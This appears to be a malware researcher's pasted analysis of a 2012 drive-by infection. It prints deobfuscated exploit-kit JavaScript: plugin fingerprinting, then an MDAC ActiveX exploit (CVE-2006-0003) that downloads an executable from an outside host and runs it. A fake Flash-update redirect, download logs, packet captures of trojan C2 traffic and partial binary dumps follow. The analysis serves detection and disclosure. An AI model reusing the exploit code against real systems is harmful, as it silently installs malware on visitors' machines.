- "Scripting.Dictionary", "wmplayer.ocx"];
- for (f = 0; f < j.length; f ++ ){
- if (c.getAXO(j[f])){
- c.ActiveXEnabled = true;
- break
- }
- }
- }
- c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
- c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
- "0.9") : null;
- c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
- c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
- /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
- RegExp.$1) : null;
- c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
- c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
- parseFloat(RegExp.$1, 10) : null;
- c.addWinEvent("load", c.handler(c.runWLfuncs, c))
- }
- , init : function (d){
- var c = this , b, d, a = {
- status :- 3, plugin : 0
- }
- ;
- if (!c.isString(d)){
- return a
- }
- if (d.length == 1){
- c.getVersionDelimiter = d;
- return a
- }
- d = d.toLowerCase().replace(/\s/g, "");
- b = c.Plugins[d];
- if (!b ||! b.getVersion){
- return a
- }
- a.plugin = b;
- if (!c.isDefined(b.installed)){
- b.installed = null;
- b.version = null;
- b.version0 = null;
- b.getVersionDone = null;
- b.pluginName = d
- }
- c.garbage = false;
- if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
- a.status =- 2;
- return a
- }
- a.status = 1;
- return a
- }
- , fPush : function (b, a){
- var c = this ;
- if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
- ])))){
- a.push(b)
- }
- }
- , callArray : function (b){
- var c = this , a;
- if (c.isArray(b)){
- for (a = 0; a < b.length; a ++ ){
- if (b[a] === null){
- return
- }
- c.call(b[a]);
- b[a] = null
- }
- }
- }
- , call : function (c){
- var b = this , a = b.isArray(c) ? c.length :- 1;
- if (a > 0 && b.isFunc(c[0])){
- c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
- }
- else {
- if (b.isFunc(c)){
- c(b)
- }
- }
- }
- , getVersionDelimiter : ",", $$getVersion : function (a){
- return function (g, d, c){
- var e = a.init(g), f, b, h = {
- }
- ;
- if (e.status < 0){
- return null
- }
- ;
- f = e.plugin;
- if (f.getVersionDone != 1){
- f.getVersion(null, d, c);
- if (f.getVersionDone === null){
- f.getVersionDone = 1
- }
- }
- a.cleanup();
- b = (f.version || f.version0);
- b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
- return b
- }
- }
- , cleanup : function (){
- }
- , addWinEvent : function (d, c){
- var e = this , a = window, b;
- if (e.isFunc(c)){
- if (a.addEventListener){
- a.addEventListener(d, c, false)
- }
- else {
- if (a.attachEvent){
- a.attachEvent("on" + d, c)
- }
- else {
- b = a["on" + d];
- a["on" + d] = e.winHandler(c, b)
- }
- }
- }
- }
- , winHandler : function (d, c){
- return function (){
- d();
- if (typeof c == "function"){
- c()
- }
- }
- }
- , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
- var b = {
- }
- ;
- a.winLoaded = true;
- a.callArray(a.WLfuncs0);
- a.callArray(a.WLfuncs);
- if (a.onDoneEmptyDiv){
- a.onDoneEmptyDiv()
- }
- }
- , winLoaded : false, $$onWindowLoaded : function (a){
- return function (b){
- if (a.winLoaded){
- a.call(b)
- }
- else {
- a.fPush(b, a.WLfuncs)
- }
- }
- }
- , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
- function (){
- var d = this , b, h, c, a, f, g;
- if (d.div && d.div.childNodes){
- for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
- c = d.div.childNodes[b];
- if (c && c.childNodes){
- for (h = c.childNodes.length - 1; h >= 0; h -- ){
- g = c.childNodes[h];
- try {
- c.removeChild(g)
- }
- catch (f){
- }
- }
- }
- if (c){
- try {
- d.div.removeChild(c)
- }
- catch (f){
- }
- }
- }
- }
- if (!d.div){
- a = document.getElementById(d.divID);
- if (a){
- d.div = a
- }
- }
- if (d.div && d.div.parentNode){
- try {
- d.div.parentNode.removeChild(d.div)
- }
- catch (f){
- }
- d.div = null
- }
- }
- , DONEfuncs : [], onDoneEmptyDiv : function (){
- var c = this , a, b;
- if (!c.winLoaded){
- return
- }
- if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
- return
- }
- for (ain c){
- b = c[a];
- if (b && b.funcs){
- if (b.OTF == 3){
- return
- }
- if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
- return
- }
- }
- }
- for (a = 0; a < c.DONEfuncs.length; a ++ ){
- c.callArray(c.DONEfuncs)
- }
- c.emptyDiv()
- }
- , getWidth : function (c){
- if (c){
- var a = c.scrollWidth || c.offsetWidth, b = this ;
- if (b.isNum(a)){
- return a
- }
- }
- return - 1
- }
- , getTagStatus : function (m, g, a, b){
- var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
- g.span, i = c.getWidth(d);
- if (!k ||! h ||! d ||! c.getDOMobj(m)){
- return - 2
- }
- if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
- return 0
- }
- if (l >= i){
- return - 1
- }
- try {
- if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
- if (!m.winLoaded && c.winLoaded){
- return 1
- }
- if (m.winLoaded && c.isNum(b)){
- if (!c.isNum(m.count)){
- m.count = b
- }
- if (b - m.count >= 10){
- return 1
- }
- }
- }
- }
- catch (f){
- }
- return 0
- }
- , getDOMobj : function (g, a){
- var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
- try {
- if (b && a){
- d.div.focus()
- }
- }
- catch (f){
- }
- return b ? c.firstChild : null
- }
- , setStyle : function (b, g){
- var f = b.style, a, d, c = this ;
- if (f && g){
- for (a = 0; a < g.length; a = a + 2){
- try {
- f[g[a]] = g[a + 1]
- }
- catch (d){
- }
- }
- }
- }
- , insertDivInBody : function (a, i){
- var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
- document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
- if (!g){
- try {
- j.write(c + 'div id="' + b + '">o' + c + "/div>");
- d = j.getElementById(b)
- }
- catch (h){
- }
- }
- g = (j.getElementsByTagName("body")[0] || j.body);
- if (g){
- if (g.firstChild && f.isDefined(g.insertBefore)){
- g.insertBefore(a, g.firstChild)
- }
- else {
- g.appendChild(a)
- }
- if (d){
- g.removeChild(d)
- }
- }
- else {
- }
- }
- , insertHTML : function (g, b, h, a, l){
- var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
- var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
- "0px", "visibility", "visible"];
- var i =
- "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
- if (!k.isDefined(a)){
- a = ""
- }
- if (k.isString(g) && (/[^\s]/).test(g)){
- g = g.toLowerCase().replace(/\s/g, "");
- q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
- q += 'style="' + i + 'display:inline;" ';
- for (o = 0; o < b.length; o = o + 2){
- if (/[^\s]/.test(b[o + 1])){
- q += b[o] + '="' + b[o + 1] + '" '
- }
- }
- q += ">";
- for (o = 0; o < h.length; o = o + 2){
- if (/[^\s]/.test(h[o + 1])){
- q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
- }
- }
- q += a + f + "/" + g + ">"
- }
- else {
- q = a
- }
- if (!k.div){
- j = n.getElementById(k.divID);
- if (j){
- k.div = j
- }
- else {
- k.div = n.createElement("div");
- k.div.id = k.divID
- }
- k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
- 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
- + "px", "verticalAlign", "baseline", "display", "block"]));
- if (!j){
- k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
- k.insertDivInBody(k.div)
- }
- }
- if (k.div && k.div.parentNode){
- k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
- pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
- try {
- p.innerHTML = q
- }
- catch (m){
- }
- ;
- try {
- k.div.appendChild(p)
- }
- catch (m){
- }
- ;
- return {
- span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
- }
- }
- return {
- span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
- }
- }
- , Plugins : {
- adobereader : {
- mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- {
- }
- , pluginHasMimeType : function (d, c, f){
- var b = this , e = b.$, a;
- for (ain d){
- if (d[a] && d[a].type && d[a].type == c){
- return 1
- }
- }
- if (e.getMimeEnabledPlugin(c, f)){
- return 1
- }
- return 0
- }
- , getVersion : function (l, j){
- var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
- if (d.isString(j)){
- j = j.replace(/\s/g, "");
- if (j){
- k = j
- }
- }
- else {
- j = null
- }
- if (d.isDefined(g.INSTALLED[k])){
- g.installed = g.INSTALLED[k];
- return
- }
- if (!d.isIE){
- a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
- if (g.getVersionDone !== 0){
- g.getVersionDone = 0;
- b = d.getMimeEnabledPlugin(g.mimeType, a);
- if (!j){
- n = b
- }
- if (!b && d.hasMimeType(g.mimeType)){
- b = d.findNavPlugin(a, 0)
- }
- if (b){
- g.navPluginObj = b;
- h = d.getNum(b.description) || d.getNum(b.name);
- h = d.getPluginFileVersion(b, h);
- if (!h && d.OS == 1){
- if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
- h = "9"
- }
- else {
- if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){
- h = "8"
- }
- }
- }
- }
- }
- else {
- h = g.version
- }
- if (!d.isDefined(n)){
- n = d.getMimeEnabledPlugin(k, a)
- }
- g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1))
- }
- else {
- b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
- c =/=\ s * ([ \ d \ .] + ) / g;
- try {
- f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src",
- ""], "", g))).GetVersions();
- for (m = 0; m < 5; m ++ ){
- if (c.test(f) && (!h || RegExp.$1 > h)){
- h = RegExp.$1
- }
- }
- }
- catch (i){
- }
- g.installed = h ? 1 : (b ? 0 :- 1)
- }
- if (!g.version){
- g.version = d.formatNum(h)
- }
- g.INSTALLED[k] = g.installed
- }
- }
- , zz : 0
- }
- }
- ;
- PluginDetect.initScript();
- PluginDetect.getVersion(".");
- pdfver = PluginDetect.getVersion("AdobeReader");
- }
- catch (e){
- }
- if (typeof pdfver == 'string'){
- pdfver = pdfver.split('.')
- }
- else {
- pdfver = [0, 0, 0, 0]
- }
- function x(s){
- d = [];
- for (i = 0; i < s.length; i ++ ){
- k = (s.charCodeAt(i) - 46).toString(16);
- if (k.length == 1)k = "0" + k;
- d.push(k);
- }
- ;
- return d.join("");
- }
- end_redirect = function (){
- window.location.href = 'h00p://4.icedambusters.com/adobe/update_flash_player.exe';
- }
- ;
- window.onbeforeunload = function (){
- return "";
- }
- ;
- try {
- var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
- ra3.setAttribute("id", ra3);
- ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
- try {
- var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), ""), ra1 = ra3.CreateObject(
- "Shell.Application", ""), ra2 = ra3.CreateObject("msxml2.XMLh00p", "");
- try {
- ra2.open("GET", "
- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy", false);
- ra2.send();
- ra0.type = 1;
- ra0.open();
- ra0.Write(ra2.responseBody);
- ra0.SaveToFile(ra4, 2);
- ra0.Close();
- }
- catch (e){
- }
- try {
- with (ra1){
- shellexecute(ra4);
- }
- }
- catch (e){
- }
- }
- catch (e){
- }
- }
- catch (errno){
- }
- document.write('');
- setTimeout(end_redirect, 60000);
- =====================================================
- EXPLOITATION & INFECTIONS OCCURED (PE BASED ONLY)
- ======================================================
- 1. MDAC Arbitrary file download via the Microsoft Data Access Components (MDAC) CVE-2006-0003
- ActiveX controls=BD96C556-65A3-11D0-983A-00C04FC29E36 Created adodb.stream w/shell apps
- using msxml2.XMLh00p download below malware
- using SaveToFile .//..//03ab326.exe to save malware
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --cookies=on --keep-session-cookies --save-cookies mycookies.txt
- --referer="h00p://74.200.211.205/SQeyUUzT/js.js"
- "h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
- --output-document="03ab326.exe"
- --16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
- => `sample1'
- Resolving ser.luckypetspetsitting.com... 198.143.159.66
- Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 256,784 (251K) [application/x-msdownload]
- 16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
- 2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
- --18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
- => `update_flash_player.exe'
- Resolving 4.icedambusters.com... 198.74.52.86
- Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 256,784 (251K) [application/octet-stream]
- 18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS PREVIOUS DROPPED!
- ==============================================================================
- NETWORK FULL ANALYSIS of Trojan, Backdor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
- ================================================================================
- 1) DNS : Standard query A rabbitharky.com
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
- 0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
- 0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
- 0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
- Standard query response A 198.143.159.66
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
- 0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
- 0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
- 0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
- 0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
- 2) h00p/1.0 POST: 192.168.7.84 ⇒ 198.143.159.66↓
- POST /forum/viewtopic.php h00p/1.0
- Host: rabbitharky.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 257
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
- ...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
- .....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
- pH...v*].....1..jw`a.....<"....4
- M.R,.._X..h00p/1.1 200 OK
- Server: nginx/0.7.67
- Date: Sat, 27 Oct 2012 08:17:04 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- 3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
- GET /CaBPXFg.exe h00p/1.0
- Host: SpringBackColorado.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:05 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdownload
- MZ......................@.........................................
- ......!..L.!This program cannot be run in DOS mode.$.......PE..L...
- R..P...............2.4...8......@........P....@....................
- ..............\......................................hw..x.........
- ...........n..........,............................................
- ........y...............................text....2.......4..........
- ........ ..`.data....3...P...4...6..............@....reloc..,......
- ......j..............@..B................U..]............U..]......
- ......U...H....H.F.P.=.......L.F.]....U..Q.E......E..h"@..P.F...]..
- ...U...E..M..H...].U...E..@.]......U......E..E..M..M..E......U...T.
- F..E..X.F..
- :
- :
- f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
- ..*.H..
- ........ ....o
- s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
- p....o..K..u..
- ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
- PoC:
- --17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
- => `CaBPXFg.exe'
- Resolving springbackcolorado.com... 64.29.151.221
- Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdownload]
- 17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
- 4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe h00p/1.0
- GET /cXbAC.exe h00p/1.0
- Host: 180degrees.org.nz
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:12 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdownload
- MZ......................@.............................................
- ..!..L.!This program cannot be run in DOS mode.$.......PE..L...R..P...
- ............2.4...8......@........P....@..............................
- ....\......................................hw..x....................n.
- .........,....................................................y.......
- ........................text....2.......4.................. ..`.data..
- ..3...P...4...6..............@....reloc..,............j..............@
- ..B................U..]............U..]............U...H....H.F.P.=...
- ....L.F.]....U..Q.E......E..h"@..P.F...].....U...E..M..H...].U...E..@.
- ]......U......E..E..M..M..E......U...T.F..E..X.F..T.F..M...X.F..U..E..
- M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E......U.;U.s..E...
- :
- :
- f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
- ..*.H..
- ........ ....o
- s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
- p....o..K..u..
- ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
- PoC:
- --17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
- => `cXbAC.exe'
- Resolving 180degrees.org.nz... 66.117.15.147
- Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdownload]
- 17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
- 5) h00p/1.0 GET weareseasons.com/7yoZf5.exe
- GET /7yoZf5.exe h00p/1.0
- Host: weareseasons.com
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- h00p/1.1 200 OK
- Date: Sat, 27 Oct 2012 08:17:19 GMT
- Server: Apache
- Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
- ETag: "b008a82d-67910-4cd05d3c57d54"
- Accept-Ranges: bytes
- Content-Length: 424208
- Connection: close
- Content-Type: application/x-msdos-program
- MZ......................@...............................................!
- ..L.!This program cannot be run in DOS mode.$.......PE..L...R..P.........
- ......2.4...8......@........P....@..................................\....
- ..................................hw..x....................n..........,..
- ..................................................y......................
- .........text....2.......4.................. ..`.data....3...P...4...6...
- ...........@....reloc..,............j..............@..B................U.
- .]............U..]............U...H....H.F.P.=.......L.F.]....U..Q.E.....
- :
- :
- I.q.M.B.d.J.3.Z.k.Z.F.U.9.S.K.g.W.6.T.u.2.g.h.B.l.2.L.Q.6.w.t.e.M.c.q.w.K.
- s.M.Z.K.Z.9.m.A.2.q.i.h.R.7.Z.W.r.V.5.N.w.Y.p.f.n.t.Y.P.b.S.D.N.n.N.C.5.2.e
- .F.o.n.I.W.k.M.Y.h.i.c.k.Q.M.j.H.e.9.p.H.G.f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.
- N.W.p.U.v.r.Z.y.x.S.G0
- ..*.H..
- ........ ....o
- s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
- p....o..K..u..
- ...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
- PoC:
- --17:54:45-- h00p://weareseasons.com/7yoZf5.exe
- => `7yoZf5.exe'
- Resolving weareseasons.com... 87.106.194.196
- Connecting to weareseasons.com|87.106.194.196|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: 424,208 (414K) [application/x-msdos-program]
- 17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
- 6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- SYN:
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
- 0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
- 0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
- REPLIES:
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
- 0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
- 0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
- 0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
- :-)) LOLZ
- 7)SYN & ACK to Malware Host 195.169.125.228
- 195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
- 0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
- 0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
- 0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
- 0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
- 192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
- 0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
- 0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
- 8) KEEP ALIVE DATA SENT TO 70.138.242.12
- 192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
- 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
- 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
- 0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
- 0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
- 0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
- 0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
- -------
- #MalwareMustDie!!! Crusaders Rocks!!
- Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement